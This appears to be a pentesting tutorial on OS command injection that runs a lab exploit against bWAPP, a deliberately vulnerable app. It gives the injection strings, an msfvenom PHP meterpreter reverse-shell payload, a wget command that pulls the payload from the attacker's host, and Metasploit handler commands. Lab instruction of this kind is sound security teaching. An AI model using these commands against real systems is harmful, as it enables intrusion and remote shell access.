OS command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell.
the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.
This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands.
OS command injection is a technique used via a web interface in order to execute OS commands on a web server. The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
How to Test
When viewing a file in a web application, the file name is often shown in the URL. Perl allows piping data from a process into an open statement. The user can simply append the Pipe symbol “|” onto the end of the file name.
Example URL before alteration:
Example URL modified:
This will execute the command “/bin/ls”.
You must have got enough information about os command injection till yet. Now let’s try some practical example using Kali Linux. We will be using bWAPP, an extremely buggy web application is a free and open source used by pentesters. I’ll assume you have bWAPP downloaded on your localhost machine.
Before opening bWAPP in browser, turn on apache2 server and mysql in terminal shell.
service apache2 start
service mysql start
Now open bWAPP and select os command injection from select your bug drop down menu. Type ;ls in form and click lookup. You will see a list of file names showing the form is not properly sanitized.
As the application is vulnerable to os command injection, we can upload a shell on the box. Before that, find your ip address by typing ifconfig in the terminal. In my case, I’ve 192.168.193.128
To create a shell/payload, move to terminal to use msfvenom (collection of msfencoder and msfpayload).
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.193.128 LPORT=1234 -f raw > /var/www/html/spirit.php
Meterpreter is a highly advance and dynamic payload, reverse_tcp is used for reverse connection to be built with LHOST (localhost machine) on LPORT (localhost machine port), -f is the format and raw is the file. The payload name is spirit.php and will be created in the localhost directory by giving respective path.
Turn on the python server:
Everything is done, so it’s time to upload the shell on the buggy web application. wget command helps to upload any file on the server. Keep in mind the shell is placed in the localhost root directory.
; wget http://192.168.193.128/spirit.php
Click lookup and your shell is uploaded on the server. For verification, use Ctrl+F to search for spirit.php
The shell has been uploaded on the server so we will use multi handler exploit through Metasploit (Hacking framework). Type the following command in terminal to start metasploit interface:
When msf starts, use the following commands:
use exploit/multi/hander set LHOST 192.168.193.128 set LPORT 1234 set payload php/meterpreter/reverse_tcp exploit
When you enter exploit, go to the buggy web application and write the following command to be executed in the terminal:
;php -f spirit.php
Wait for the second till the exploit makes a connection with shell uploaded on the server. And that’s it, meterpreter command line interface will start to execute your commands.
To see a bunch of os commands just type help in the meterpreter interface.
This is it, enjoy exploring vulnerabilities.
To learn how to sanitize os command injections through forms, clear here.